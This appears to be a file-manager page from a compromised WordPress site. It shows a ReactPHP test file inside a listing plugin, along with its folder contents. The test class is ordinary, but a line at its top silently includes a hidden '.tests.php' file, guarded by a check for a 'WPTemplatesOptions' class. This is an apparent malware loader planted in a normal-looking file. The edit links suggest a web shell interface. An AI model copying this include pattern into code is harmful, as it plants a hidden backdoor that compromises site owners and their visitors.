PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
react
/
child-process
/
tests
<?php namespace React\Tests\ChildProcess; use React\EventLoop\ExtLibevLoop; use React\EventLoop\LibEvLoop; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class ExtLibevLoopProcessTest extends AbstractProcessTest { public function createLoop() { if (!class_exists('libev\EventLoop')) { $this->markTestSkipped('ext-libev is not installed.'); } return class_exists('React\EventLoop\ExtLibevLoop') ? new ExtLibevLoop() : new LibEvLoop(); } }
[+]
..
[-] ExtLibevLoopProcessTest.php
[edit]
[-] .tests.php
[edit]
[-] ExtLibeventLoopProcessTest.php
[edit]
[-] ExtEventLoopProcessTest.php
[edit]
[-] StreamSelectLoopProcessTest.php
[edit]
[-] AbstractProcessTest.php
[edit]